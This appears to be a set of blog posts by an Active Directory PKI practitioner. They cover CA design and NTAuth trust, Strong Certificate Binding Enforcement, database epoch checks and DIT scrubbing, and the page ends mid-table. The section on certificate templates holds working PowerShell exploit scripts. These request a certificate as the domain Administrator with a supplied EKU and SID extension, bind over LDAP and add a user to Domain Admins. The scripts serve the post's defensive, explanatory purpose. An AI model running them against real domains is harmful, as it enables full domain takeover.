So I have been back in Sweden for about two weeks, working on an intense project involving PKI (AD CS, Venafi, PointSharp NetID Portal, and Thales Luna HSMs) as well as Active Directory and tiering.
Issues and challenges with “Supply in the request” (SITR) – Certificate Templates
How NTAuth works and what it means if a Certificate Authority is trusted in NTAuth
That the new Strong Certificate Binding Enforcement is a response to CVE-2022-34691, CVE-2022-26931, CVE-2022-26923 and is NOT designed to resolve the challenges with “Supply in the request” (SITR) – Certificate Templates
That templates that lack the Client Authentication EKU (1.3.6.1.5.5.7.3.2) might still be usable for PKINIT and Schannel anyway.
Let’s talk about possibilities to mitigate – the first option is to design your PKI hierarchy so that you have at least two CAs, where one of them is trusted in NTAuth and the other isn’t.
Design 1 – Preferred works for most organizations
Issuing CA 1 (AD CS) – Installed as Enterprise CA trusted in NTAuth – Issues certificates used for authentication such as Smart Card/Yubikey PIV, 802.1x (Only important if you’re running NPS in particular) and any other certificate where the subject is built from the Active Directory user or computer. This CA should never have certificate templates published with “Supply in the request” (SITR).
Issuing CA 2 (AD CS) – Installed as Enterprise CA (The CA is going to be initially trusted in NTAuth as it’s installed as an Enterprise CA and has to be installed by an Enterprise Admin within the forest or by an account that is delegated to write to the NTAuth object anyway) –
Important! This CA has to be removed from NTAuth manually, and this has to be repeated every time the CA certificate is renewed. Read more about NTAuthGuard by Carl Sörqvist further down as an automated solution for this task.
As this CA is installed as an Enterprise CA it will still have the capability to publish certificate templates and enable auto-enrollment for clients/servers. It is intended as an SSL/TLS CA and can safely publish certificate templates where the subject can be supplied, aka “Supply in the request” (SITR).
However, there are some more restrictions that should be applied on this CA – I would recommend disabling the following extensions so the CA can never include them in any certificates:
DisableExtensionList +1.3.6.1.4.1.311.25.2 (SID) – The SID extension is not needed, as this CA should never issue any certificates used for authentication and therefore does not need to be compliant with the Strong Certificate Binding Enforcement requirements.
DisableExtensionList +1.3.6.1.4.1.311.21.10 (App Policies) – This is a legacy proprietary extension that allows the requester to supply an EKU of choice in the request on templates that are missing the ‘msPKI-Certificate-Application-Policy’ attribute – typically v1 templates such as the built-in ‘WebServer’ template, but not limited to those.
Note that ‘DisableExtensionList’ can be set using the certutil command line utility – for example:
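For example, to disable both extensions on “Issuing CA 2”, run the following on the CA itself in an elevated prompt and then restart the service for the change to take effect:

```powershell
# Append the SID extension and the legacy Application Policies extension
# to the CA's DisableExtensionList (the '+' prefix appends to the multi-value)
certutil -setreg policy\DisableExtensionList +1.3.6.1.4.1.311.25.2
certutil -setreg policy\DisableExtensionList +1.3.6.1.4.1.311.21.10
Restart-Service certsvc
```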
Secure “Supply in the request” (SITR) templates additionally – As an extra safety precaution I recommend that SITR templates are configured with the ‘msPKI-Enrollment-Flag’ attribute containing the new bit/flag ‘0x00080000 – CT_FLAG_NO_SECURITY_EXTENSION’, to make sure that certificates generated from those templates can never include the SID extension regardless of which CA they are published on (as long as we’re speaking AD CS).
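As a minimal sketch of how this could be scripted with the ActiveDirectory module – ‘MyWebTemplate’ is a placeholder template name, adjust for your environment:

```powershell
Import-Module ActiveDirectory
# CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000
$flag = 0x00080000
$dn = "CN=MyWebTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services," +
      (Get-ADRootDSE).configurationNamingContext
$tmpl = Get-ADObject -Identity $dn -Properties msPKI-Enrollment-Flag
Set-ADObject -Identity $dn -Replace @{
    'msPKI-Enrollment-Flag' = ($tmpl.'msPKI-Enrollment-Flag' -bor $flag)
}
```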
Design 1 and Tiering – Note that this design requires both “Issuing CA 1” and “Issuing CA 2” to be managed from T0. To be clear, they can both issue certificates to clients/servers in all tiers, and you can even delegate certificate manager responsibilities to T1 on “Issuing CA 2” – what you can’t do, however, is allow T1 to log on interactively to “Issuing CA 2”.
Design 1 – Design Rationale – Some will probably argue: why not just have one Enterprise CA and make sure that all the “Supply in the request” (SITR) templates are configured to require certificate manager approval? Sure, this can work for small businesses, but remember that each request must be reviewed before being approved by a T0 administrator – they typically have other things to do.
The hygiene factor is hard if it’s not automated – reporting templates that have “Supply in the request” (SITR) enabled while lacking the certificate manager approval requirement, or even remediating them. When performing security assessments at Epical we always see the leftovers of templates where someone just wanted to test something or was in a hurry and might have intended to change the settings back to what they should be. This design minimizes those mistakes as well, and it’s fairly easy to script compliance checks when the CAs are split by the type of templates they should publish.
Here is a sample script for that:
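The script I have in mind is roughly along these lines – a minimal sketch that reports templates with SITR enabled (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in ‘msPKI-Certificate-Name-Flag’) but without the certificate manager approval requirement (CT_FLAG_PEND_ALL_REQUESTS in ‘msPKI-Enrollment-Flag’); the bit values are from MS-CRTD:

```powershell
Import-Module ActiveDirectory
$ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
$PEND_ALL_REQUESTS         = 0x00000002  # msPKI-Enrollment-Flag (manager approval)
$base = "CN=Certificate Templates,CN=Public Key Services,CN=Services," +
        (Get-ADRootDSE).configurationNamingContext
Get-ADObject -SearchBase $base -LDAPFilter '(objectClass=pKICertificateTemplate)' `
        -Properties msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag |
    Where-Object {
        ($_.'msPKI-Certificate-Name-Flag' -band $ENROLLEE_SUPPLIES_SUBJECT) -and
        -not ($_.'msPKI-Enrollment-Flag' -band $PEND_ALL_REQUESTS)
    } |
    Select-Object -ExpandProperty Name
```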
NTAuthGuard by Carl Sörqvist – NTAuthGuard is a solution from Carl Sörqvist that helps us with the fact that in Design 1, as mentioned above, both “Issuing CA 1” and “Issuing CA 2” are AD CS Enterprise CAs, meaning they will both publish and trust themselves in NTAuth (and have to be installed by an Enterprise Admin within the forest, or by an account that is delegated to write to the NTAuth object anyway). “Issuing CA 2” needs to be removed manually, and this has to be repeated every time the CA certificate is renewed.
NTAuthGuard allows us to define a whitelist of CA certificate thumbprints that are allowed to be trusted in NTAuth – the script can log events if a CA certificate that is not whitelisted becomes trusted in NTAuth, or even take action and remove the non-whitelisted CA certificate from NTAuth.
Last week I presented my session “When your Enterprise PKI becomes one of your enemies” at the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans – thanks to all who attended my session and for all of the follow-up questions I got later during the conference, and now also on social media and e-mail. I’m very sorry that my last two demos didn’t work; the reason was an issue with the CDP in my demo environment – the KDC didn’t consider its own certificate valid for PKINIT, hence the problem.
The first part of the presentation outlined something very common and dangerous that we already see today: Enterprise CAs trusted for authentication against Active Directory publishing certificate templates that allow the subject to be supplied in the request (SITR).
But how can you determine if a CA is trusted for authentication against Active Directory? Either it is trusted in NTAuth, and leaf certificates and KDC certificates have their full chain trusted and valid – this allows for implicit/explicit UPN mapping, e.g. the SAN in the certificate matches the userPrincipalName attribute of the user within Active Directory. Or, if the CA is not trusted in NTAuth, only explicit mapping is available using the altSecurityIdentities attribute – and leaf certificates and KDC certificates must still have their full chain trusted and valid.
By default if you install an Enterprise CA using Active Directory Certificate Services (AD CS) – it will be trusted in NTAuth.
Above you can see the requirements to be trusted to authenticate to Active Directory using certificates – note that Schannel in the S4U2Self scenarios involves the KDC, and the authentication part pertains to either NTAuth (implicit mapping) or AltSecID (explicit mapping).
The methods in blue are required to be considered strong according to the Strong Certificate Binding Enforcement (more on that later).
Active Directory – So let’s have a look at how NTAuth works. CAs trusted in NTAuth are stored at the following location in Active Directory: ‘CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=X’, with their certificates in the multi-valued attribute ‘cACertificate’.
Clients – On every domain joined computer a copy of all the trusted CAs in the above attribute is stored in the registry at the following location: ‘HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates’, where one key for each CA is created and named after the thumbprint of the CA certificate.
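You can compare the two stores yourself – the AD view via certutil and the local cache via the registry:

```powershell
# View NTAuth as stored in the configuration partition of Active Directory
certutil -viewstore -enterprise NTAuth

# List the locally cached CA thumbprints on this machine
(Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates').PSChildName
```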
Group Policy – The Autoenrollment Client Side Extension (CSE) is supposed to cache the content from AD to the registry on each domain joined machine within the forest (including DCs).
So who is validating that the CA is trusted in NTAuth?
Domain Controllers / KDC (if not explicit mapping using AltSecID)
Network Policy Server (NPS)
LDAP-STARTTLS
IIS – SCHANNEL
ADFS – SCHANNEL (Even if explicit mapping exist using AltSecID)
Enrollment of templates that have private key archival enabled
So how is the validation that the CA is trusted in NTAuth performed? If we’re online we’re taking a trip to ‘CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=X’ using LDAP, right?
Nope – verification is done using an API: we’re calling into crypt32.dll?CertVerifyCertificateChainPolicy with the ‘CERT_CHAIN_POLICY_NT_AUTH’ policy.
Note: You can test this using PowerShell: Test-Certificate -Cert $cert -Policy NTAUTH
The API performs two checks:
1. Verify that the certificate chain is valid from the leaf certificate to the Root CA certificate and that the full chain is trusted.
2. Verify that the CA directly above the leaf certificate is trusted in NTAuth – this check is done locally by looking in the registry on the client under ‘HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates’ – the API never asks Active Directory.
What is Strong Certificate Binding Enforcement? Strong Certificate Binding is a response to CVE-2022-34691, CVE-2022-26931 and CVE-2022-26923, addressing an elevation of privilege vulnerability that can occur when the Kerberos Key Distribution Center (KDC) is servicing a certificate-based authentication request. Before the May 10, 2022 security update, certificate-based authentication would not account for a dollar sign ($) at the end of a machine name. This allowed related certificates to be emulated (spoofed) in various ways. Additionally, conflicts between User Principal Names (UPN) and sAMAccountName introduced other emulation (spoofing) vulnerabilities that are also addressed by this security update. More information can be found here: KB5014754: Certificate-based authentication changes on Windows domain controllers and here: Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) | by Oliver Lyak | IFCR
Specifically this protects from the following four scenarios:
dNSHostName/servicePrincipalName computer owner abuse: remove the DNS SPNs from servicePrincipalName, steal the DNS hostname of a DC, put it in your computer account’s dNSHostName attribute and request a certificate – authenticate with the certificate and you’re a DC.
Overwrite the userPrincipalName of a user to be the sAMAccountName of the target, to hijack the user account, since the missing domain part does not violate an existing UPN.
Overwrite the userPrincipalName of a user to be the machine account name @ the domain of the target, to hijack a machine account, since machine accounts don’t have a UPN.
Delete the userPrincipalName of a user and overwrite sAMAccountName to be a machine account name without a trailing $, to hijack a machine account.
Note: 2-4 would require permissions to write to the ‘userPrincipalName’ attribute
So how is Strong Certificate Binding Enforcement implemented?
As outlined in KB5014754: Certificate-based authentication changes on Windows domain controllers, once we’re in Full Enforcement mode there are only 3 ways to stay compliant – otherwise certificate-based authentication is going to fail against Active Directory. Full Enforcement mode is planned for February 11, 2025 by default, with an option to opt out until September 10, 2025 by explicitly configuring your domain controllers to be in Compatibility Mode. But if you have not already rolled into Enforcement Mode yourself, it means your Active Directory is still vulnerable to those CVEs.
Options to be compliant with Strong Certificate Binding Enforcement:

1. Certificate SID Extension – The certificate must contain the ‘1.3.6.1.4.1.311.25.2’ SID extension, which encodes the SID of the user or computer the certificate is issued for/to be used for authentication with. Certificate re-issue required: Yes.

2. SAN URL – The SAN of the certificate must contain one entry of type URL with the value “tag:microsoft.com,2022-09-14:sid:<value>”, where <value> is the SID of the user or computer the certificate is issued for/to be used for authentication with. This is only accepted by the KDC on Windows Server 2019 – Windows Server 2025 DCs. Certificate re-issue required: Yes.

3. AltSecID – Use the ‘altSecurityIdentities’ attribute to strongly map the certificate to the user or computer the certificate is issued for/to be used for authentication with. Only the following mapping methods are considered strong:
– X509IssuerSerialNumber: “X509:<I>IssuerName<SR>1234567890”
– X509SKI: “X509:<SKI>123456789abcdef”
– X509SHA1PublicKey: “X509:<SHA1-PUKEY>123456789abcdef”
Certificate re-issue required: No.

4. Issuer-OID-MappingType triplet – More information will be available shortly. Certificate re-issue required: No, if the Issuer OID is present.
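To illustrate the AltSecID method, here is a hedged sketch of creating a strong X509IssuerSerialNumber mapping – the user name, issuer DN and serial number below are placeholders, and note that KB5014754 requires the serial number in reversed byte order:

```powershell
# Strong explicit mapping via altSecurityIdentities (X509IssuerSerialNumber)
# The issuer is written in reversed DN order and the serial number byte-reversed
Set-ADUser -Identity someuser -Replace @{
    altSecurityIdentities = 'X509:<I>DC=com,DC=chrisse,DC=nttest,CN=Chrisse Issuing CA 1<SR>1200000000AC11000000002B'
}
```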
Supply in the request (SITR) without Client Authentication EKU in the template
One of the requirements for the KDC to accept a certificate for authentication using PKINIT is that the EKU contains either Client Authentication (1.3.6.1.5.5.7.3.2), id-pkinit-KPClientAuth (1.3.6.1.5.2.3.4) or Smart Card Logon (1.3.6.1.4.1.311.20.2.2).
Microsoft has a proprietary extension called Certificate Application Policies that is used as an EKU, defined by the ‘msPKI-Certificate-Application-Policy’ attribute on certificate templates. As this attribute isn’t populated (is empty) on v1 certificate templates, the application policies can be supplied in the request exactly the same way as we could supply a SAN.
Microsoft issued a statement on this just the day before my presentation at the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans – the statement from MSRC can be found here: Active Directory Certificate Services Elevation of Privilege Vulnerability – CVE-2024-49019. But it’s not telling you the entire truth about how this works: per se, this has nothing to do with whether the template is v1 or not – it has to do with, and only with, whether the ‘msPKI-Certificate-Application-Policy’ attribute is populated. If you copy a v1 template, let’s say the default ‘WebServer’ template, it’s upgraded and the values in ‘pKIExtendedKeyUsage’ are copied by the ‘Certificate Templates’ MMC into ‘msPKI-Certificate-Application-Policy’ and you’re safe – so what is not being told here:
If you have, let’s say, a v2 template and don’t define EKUs, or leave msPKI-Certificate-Application-Policy empty – you’re just as subject to having EKUs supplied in the request, regardless of template version. Are there any real world scenarios for this? Well, here is an example of a vendor who guides certificate templates to be created this way: Create and Add a Microsoft Certificate Authority Template
Let’s try using this by showing some sample code – for this to work we assume that the default template ‘WebServer’ is published at an Enterprise CA named ‘nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1’ that is trusted in NTAuth, in a forest with a root domain named nttest.chrisse.com, and that the built-in administrator account exists by its default name – to utilize this, the enrollment permissions need to be granted to either a user or computer within the forest.
1. WebServer-AppPolicy.ps1
Import-Module -Name CertRequestTools
# CA1 IS trusted in NTAuth
$CA1 = "nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1"
$ApplicationPoliciesExtension = New-Object -ComObject X509Enrollment.CX509ExtensionMSApplicationPolicies
$ApplicationPolicyOids = New-Object -ComObject X509Enrollment.CCertificatePolicies.1
$ApplicationPolicyOid = New-Object -ComObject X509Enrollment.CObjectId
$ApplicationPolicyOid.InitializeFromValue('1.3.6.1.5.5.7.3.2') # Client Authentication EKU
$CertificatePolicy = New-Object -ComObject X509Enrollment.CCertificatePolicy
$CertificatePolicy.Initialize($ApplicationPolicyOid)
$ApplicationPolicyOids.Add($CertificatePolicy)
$ApplicationPoliciesExtension.InitializeEncode($ApplicationPolicyOids)
$ManagedApplicationPoliciesExtension = [System.Security.Cryptography.X509Certificates.X509Extension]::new(
    $ApplicationPoliciesExtension.ObjectId.Value,
    [Convert]::FromBase64String($ApplicationPoliciesExtension.RawData(1)),
    $ApplicationPoliciesExtension.Critical)
New-PrivateKey -RsaKeySize 2048 -KeyName ([Guid]::NewGuid()) |
    New-CertificateRequest -Subject "CN=DEMO1" `
        -UserPrincipalName administrator@nttest.chrisse.com `
        -OtherExtension $ManagedApplicationPoliciesExtension |
    Submit-CertificateRequest -ConfigString $CA1 -Template WebServer |
    Install-Certificate -Name My -Location CurrentUser
So now we have a certificate with the UPN of the built-in administrator (RID 500), and we supplied the required Client Authentication EKU in the request using the ‘WebServer’ template, so our certificate with the subject “CN=DEMO1” should be able to authenticate and become the Administrator account (RID 500). To do this we use another script to perform LDAP-STARTTLS – select the certificate issued by the previous script when prompted. Note: Change the domain controller from ‘nttest-dc-01.nttest.chrisse.com’ to your own DC; the KDC must be capable of performing PKINIT, e.g. have a valid KDC certificate.
LDAP-TLSv2.ps1
Add-Type -AssemblyName System.DirectoryServices.Protocols
Add-Type -AssemblyName System.Security
# Change the domain controller to your own DC instead of 'nttest-dc-01.nttest.chrisse.com'
$Id = New-Object -TypeName System.DirectoryServices.Protocols.LdapDirectoryIdentifier -ArgumentList 'nttest-dc-01.nttest.chrisse.com',389,$true,$false
$Ldap = New-Object -TypeName System.DirectoryServices.Protocols.LdapConnection -ArgumentList $Id,$null,([System.DirectoryServices.Protocols.AuthType]::External)
$Ldap.AutoBind = $false
"Certificate selection" | Write-Host
$Location = [System.Security.Cryptography.X509Certificates.StoreLocation]::CurrentUser
$Name = [System.Security.Cryptography.X509Certificates.StoreName]::My
$Store = New-Object -TypeName System.Security.Cryptography.X509Certificates.X509Store -ArgumentList $Name,$Location
$Store.Open("ReadOnly, MaxAllowed, OpenExistingOnly")
$Cert = [System.Security.Cryptography.X509Certificates.X509Certificate2UI]::SelectFromCollection($Store.Certificates.Find("FindByKeyUsage",0xa0,$true).Find("FindByExtension","2.5.29.35",$true),"Certificate selection","Select a certificate","SingleSelection")
$Store.Dispose()
$Ldap.ClientCertificates.Clear()
[void]$Ldap.ClientCertificates.Add($Cert[0])
$Ldap.SessionOptions.QueryClientCertificate = {
    param(
        [System.DirectoryServices.Protocols.LdapConnection] $Connection,
        [Byte[][]] $TrustedCAs
    )
    return $Cert[0]
}
"Starting TLS" | Write-Host
$Ldap.SessionOptions.StartTransportLayerSecurity($null)
$RootDseSearchRequest = New-Object -TypeName System.DirectoryServices.Protocols.SearchRequest -ArgumentList '',"(&(objectClass=*))","Base"
Try {
    $RootDseSearchResponse = $null
    $RootDseSearchResponse = $Ldap.SendRequest($RootDseSearchRequest)
}
Catch {
    $Ldap.Dispose()
    throw $_
}
"Default naming context: {0}" -f $RootDseSearchResponse.Entries[0].Attributes["defaultNamingContext"].GetValues([String])
"Binding" | Write-Host
Try {
    $Ldap.Bind()
}
Catch {
    throw
}
# Send an Extended WHOAMI request
$ExtReq = New-Object -TypeName System.DirectoryServices.Protocols.ExtendedRequest -ArgumentList "1.3.6.1.4.1.4203.1.11.3"
$ExtRes = [System.DirectoryServices.Protocols.ExtendedResponse] $Ldap.SendRequest($ExtReq)
"Bound as identity: '{0}'" -f [System.Text.Encoding]::UTF8.GetString($ExtRes.ResponseValue)
# Change to a user you want to add to domain admins
$UserDN = "CN=Guest,CN=Users,DC=nttest,DC=chrisse,DC=com"
"Adding '{0}' to Domain Admins" -f $UserDN
$Modify = [System.DirectoryServices.Protocols.ModifyRequest]::new("CN=Domain Admins,CN=Users,DC=nttest,DC=chrisse,DC=com","Add","member",$UserDN)
Try {
    $Response = $Ldap.SendRequest($Modify)
}
Catch {
    $Response = $_.Exception.GetBaseException().Response
}
"Result: {0}" -f $Response.ResultCode
$Ldap.Dispose()
Supply in the request (SITR) with Strong Certificate Binding Enforcement
If we now enable Strong Certificate Binding Enforcement on our KDCs / Domain Controllers by creating the registry value “StrongCertificateBindingEnforcement” (type DWORD) under “HKLM\SYSTEM\CurrentControlSet\Services\Kdc” and setting it to “2” – Strong Certificate Binding Enforcement is now enabled.
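A one-liner to set this (assumes an elevated prompt on the domain controller; remember this needs to be done on all KDCs):

```powershell
# Enable Full Enforcement mode for certificate-based authentication on this KDC
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Kdc' `
    -Name 'StrongCertificateBindingEnforcement' -PropertyType DWord -Value 2 -Force
```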
We can verify this by trying to authenticate with the certificate already issued above, with the subject CN=DEMO1 – simply run LDAP-STARTTLS – select the certificate issued by the previous script when prompted.
This time the authentication should fail. This is expected, as the certificate is not compliant with Strong Certificate Binding Enforcement: it doesn’t contain the SID extension, nor a SAN with the SID, nor is it explicitly mapped in the altSecurityIdentities attribute.
So this means that once we reach Strong Certificate Binding Enforcement on all our KDCs / Domain Controllers we’re safe from this supply in the request madness right? Absolutely NOT. Because what if the SID extension could also be supplied in the request?
Let’s issue a certificate once again using the same template ‘WebServer’ but supply a SID as well.
2. WebServer-AppPolicySCBE.ps1
Import-Module -Name CertRequestTools
# CA1 IS trusted in NTAuth
$CA1 = "nttest-ca-01.nttest.chrisse.com\Chrisse Issuing CA 1"
# Insert the SID as szOID_NTDS_CA_SECURITY_EXT certificate extension
$SidExtension = New-SidExtension -NTAccount NTTEST\Administrator
$ApplicationPoliciesExtension = New-Object -ComObject X509Enrollment.CX509ExtensionMSApplicationPolicies
$ApplicationPolicyOids = New-Object -ComObject X509Enrollment.CCertificatePolicies.1
$ApplicationPolicyOid = New-Object -ComObject X509Enrollment.CObjectId
$ApplicationPolicyOid.InitializeFromValue('1.3.6.1.5.5.7.3.2') # Client Authentication EKU
$CertificatePolicy = New-Object -ComObject X509Enrollment.CCertificatePolicy
$CertificatePolicy.Initialize($ApplicationPolicyOid)
$ApplicationPolicyOids.Add($CertificatePolicy)
$ApplicationPoliciesExtension.InitializeEncode($ApplicationPolicyOids)
$ManagedApplicationPoliciesExtension = [System.Security.Cryptography.X509Certificates.X509Extension]::new(
    $ApplicationPoliciesExtension.ObjectId.Value,
    [Convert]::FromBase64String($ApplicationPoliciesExtension.RawData(1)),
    $ApplicationPoliciesExtension.Critical)
New-PrivateKey -RsaKeySize 2048 -KeyName ([Guid]::NewGuid()) |
    New-CertificateRequest -Subject "CN=DEMO2" `
        -UserPrincipalName administrator@nttest.chrisse.com `
        -OtherExtension $SidExtension,$ManagedApplicationPoliciesExtension |
    Submit-CertificateRequest -ConfigString $CA1 -Template WebServer |
    Install-Certificate -Name My -Location CurrentUser
Now you should have an issued certificate with the subject “CN=DEMO2”. Use the LDAP-STARTTLS script again to authenticate using the new certificate – make sure you select the right certificate; if you want to be sure you can just open certmgr.msc and delete “CN=DEMO1”.
You should now have been authenticated, even though the KDC / Domain Controller is in Strong Certificate Binding Enforcement mode.
To wrap up this first blog post, which is an attempt to cover what was presented in the first part of my session “When your Enterprise PKI becomes one of your enemies” at the Hybrid Identity Protection (HIP) Conference 2024 in New Orleans last week, there are some key takeaways.
“Strong Certificate Binding Enforcement” will not help you with bad certificate template hygiene at all; it was designed to prevent CVE-2022-34691, CVE-2022-26931 and CVE-2022-26923.
Certificate templates without the ‘msPKI-Certificate-Application-Policy’ attribute populated are subject to EKUs being supplied in the request, regardless of template version.
Equally – certificate templates with at least one EKU in ‘msPKI-Certificate-Application-Policy’ are protected. (You can patch the default v1 ‘WebServer’ template if you want – I’m not in any way recommending the use of v1 templates.)
The next part will look into how all this can be mitigated by choosing the right design and how templates can be optimally configured – after that I’m going to cover some of the really bad scenarios.
This blog post will describe and go into details about the maybe not so well-known Active Directory database Epoch / copy protection.
This concept was introduced with the initial release of Active Directory Application Mode (ADAM), but never made it to Active Directory Domain Services (AD DS) until Longhorn/WS2008, for some good reasons (now follows some ADAM history). One of the changes with Windows Server 2008 was that AD got exposed as a Windows service, allowing admins to stop, restart and start the service on DCs. This behavior had existed since day one in ADAM, first introduced as a standalone download in November 2003, which also targeted Windows XP. In Windows Server 2003 R2, ADAM Service Pack 1 (SP1) is included as a Windows component (on CD2) but still shipped as a download for other operating systems. ADAM Service Pack 2 (SP2) is the last version to ship, apart from some QFEs and security updates, before the ADAM source code was merged into the Directory Service (DS) source depot, integrated into Windows builds and became available again with Windows Server 2008/Windows 7, rebranded as Active Directory Lightweight Directory Services (AD LDS) – an installable role in the operating system, with no more downloads available.
Let’s look at the potential issues and damage this feature is trying to protect from, given the above.
Pre-Windows Server 2008 and ADAM it wasn’t that easy to manually restore or replace the database (DIT) using unsupported restore methods – at least not for the average sysadmin. You needed to boot into DSRM – Directory Services Restore Mode – because the DB was locked by LSASS/ESE, and the database by default was located under the C:\Windows folder.
Now with these requirements gone as per Windows Server 2008 and ADAM/AD LDS – Microsoft wanted to prevent some scenarios:
Potentially foreseen scenarios:
• Stop service, copy off database, restart service, make changes that replicate, stop service, copy old database back in.
• Stop service, copy off database from instance1, stop second service, copy database over data files for instance2.
Both these scenarios break the Active Directory replication model, because two different/distinct changes could get the same <OriginatingInvocationID>:<OriginatingUSN> pair (let’s call this the ChangeID). If two changes have the same ChangeID, one of those two changes would fail to replicate, because the DSA will claim to have “seen” the change with the same ChangeID from the previous instance of the database, and fail to replicate the new change with this ChangeID. Also, other partners of this instance will assume they’ve seen any new changes made that match previous changes this DSA has replicated out.
The implementation – a database epoch stored both in the database (DIT) and in the registry. During initialization of the DSA and the DB, a random value is written in case of a non-existent epoch, or otherwise the current epoch +1 is written, both to the database (DIT) – more specifically to the “epoch_col” column in the hiddentable – and to the “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\DSA Database Epoch” registry DWORD.
The rules are as follows:
If both the registry and the database have NULL – it’s considered a match. The epoch is initially set with rand() in both the database and the registry
if the value stored in the database is > than the value stored in the registry – it’s considered a match.
If the value stored in the database and the registry match – it’s considered a match
In case 2 or 3 the epoch is advanced by 1 in both the database and the registry; if any of the updates fail, the ESE update to the DIT is rolled back.
If the “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\ Disable DSA Database Epoch Check” Registry DWORD is set to 1 it’s considered a match.
If the values do not match as per rules 1-3 above, a “restore” is forced to get a new invocationID for the DSA/DRA and the following event is logged:
Table 1: Epoch mismatch and restore initiated
Event ID: 2524
Source: ActiveDirectory_DomainService
Category: Backup
Description: The Directory Server detected that the database has been replaced. This is an unsafe and unsupported operation. User Action: None. Active Directory Domain Services was able to recover the database in this instance, but this is not guaranteed in all circumstances. Replacing the database is strongly discouraged. The user is strongly encouraged to use the backup and restore facility to rollback the database.
The “restore” is forced by setting the “state_col” in the “hiddentable” to “4”, aka “BackedupDIT”, as well as setting “uns_col” to the next USN-1 and “backupexpiration_col” to the next day.
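The epoch check described above can be summarized in pseudocode – this is my reading of the observed behavior, and the function names are placeholders, not actual NTDS internals:

```powershell
# Pseudocode sketch of the DSA database epoch check at init
if ($disableEpochCheck -eq 1)                        { Continue-Init }      # rule 5: check disabled
elseif ($null -eq $dbEpoch -and $null -eq $regEpoch) { Write-RandomEpoch }  # rule 1: both NULL, seed with rand()
elseif ($dbEpoch -ge $regEpoch)                      { Advance-Epoch }      # rules 2-3: match, advance by 1 (rule 4)
else {
    # Mismatch: force a "restore" (new invocationID) and log event 2524
    Force-Restore
}
```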
If retrieving the epoch from the database fails for any other reason than the column being null/nonexistent, or the registry value being nonexistent, the DSA is going to fail init and stop hard with the following error message:
Table 2: Epoch mismatch fatal
Event ID: 2542
Source: ActiveDirectory_DomainService
Category: Backup
Description: The Directory Server detected that the database has been replaced. This is an unsafe and unsupported operation. The service will stop until the problem is corrected. User Action: Restore the previous copy of the database that was in use on this machine. In the future, the user is strongly encouraged to use the backup and restore facility to rollback the database. This error can be suppressed and the database repaired by removing the following registry key. Additional Data Registry key: System\CurrentControlSet\Services\NTDS\Parameters Registry value: DSA Database Epoch
Note that this feature could have been implemented differently – technically there is no need to change/advance the epoch each time during init, not even during an originating write to the database (DIT) – it only really needs to change when a new originating write has replicated off the local DSA.
I wrote this blog post because I got a question – “So what happens when distribution DIT is mounted” – If you don’t know what the distribution DIT is you can read about it here: https://blog.chrisse.se/?p=1005
The answer to the question can be figured out by reading this post (rule 1 above). The answer explained: the “epoch_col” is NULL in the distribution DIT, and when the DSA initializes on the distribution DIT for the first time the registry value doesn’t exist either – per the above that is considered a match, and a random value is written as the initial epoch to both the database (DIT) and the registry on the DSA.
Bonus: the “state_col” of a distribution DIT should be “1”.
It will NOT remove the FAS (Filtered Attribute Set) from the link_table? Can you even have FAS data there? Sure – in the “link_data” column, for the string/data portion of a linked attribute with syntax DN-String or DN-Binary: https://learn.microsoft.com/en-us/windows/win32/adschema/syntaxes
Dumping the “link_table” from a Windows 2000 Server DC, just because there are only a few initial columns in the table on Windows 2000 DCs – and I have all kinds of DITs around for testing when I write tools.
So now we’re coming to the scrubbing part – let’s say you used the VSS API and the NTDS Writer with “RODC_REMOVE_SECRETS;” _AND_ cleaned up any potential linked FAS attribute that stored its data in the “link_data” column on your own.
Would the NTDS.DIT be secure? Nope – you need to scrub your DIT for it to become secure. You just call into esent.dll?JetDBUtilitiesW and ask for a scrub operation (opDBUTILEDBScrub) to take place. If I say securing the DIT instead of scrubbing, does that sound more familiar to you?
So why is this done? Well, the “NTDS Writer” with “RODC_REMOVE_SECRETS;” just calls regular Jet/ESENT APIs to delete the columns/attributes that contained hidden, secret or FAS data – and that is what you’re doing in the “link_table” as well, but it’s more complicated, as we can’t drop the entire column; instead the data in the “link_data” column needs to be reset for the specific row representing the linked attribute, using for example JetSetColumn | JetSetColumnDefaultValue.
Regardless of the above, there is no guarantee that all metadata and leftover data isn’t still present somewhere in the database – hence the need to secure/scrub the DIT.
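The link_table cleanup described above can be modelled in a few lines. This is a pure-Python toy, not real ESE code: the column names mirror the DIT columns discussed in the text, but the FAS link-base value is hypothetical, and resetting a dict value stands in for what JetSetColumn would do against the real database:

```python
# Hypothetical link base representing a linked attribute in the Filtered
# Attribute Set -- illustrative only, not a real schema value.
FAS_LINK_BASES = {59000}

def scrub_link_table(rows):
    """Toy model of the manual link_table cleanup: we can't drop the
    link_data column, so for every row belonging to a FAS linked
    attribute we reset just that row's link_data value."""
    for row in rows:
        if row["link_base"] in FAS_LINK_BASES and row["link_data"] is not None:
            row["link_data"] = None  # reset the secret/FAS payload
    return rows
```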
By the way, you don’t need to write your own code and call into esent.dll?JetDBUtilitiesW – you can just use the undocumented option “Z” of esentutl.exe, which has been there since Windows Server 2008:
So every Windows Server has an NTDS.dit file, right? Well, all Windows Server domain controllers, you mean? Nope – they in fact have two :)
There is something referred to as the distribution DIT that works as a template DIT and is used when you promote a machine to a DC (either ADAM/ADLDS or ADDS), either as the first DC in a forest or as a replica.
The distribution DIT can be found at the following location:
Table 1: Distribution DIT Location

| Role | Location | SxS | OS |
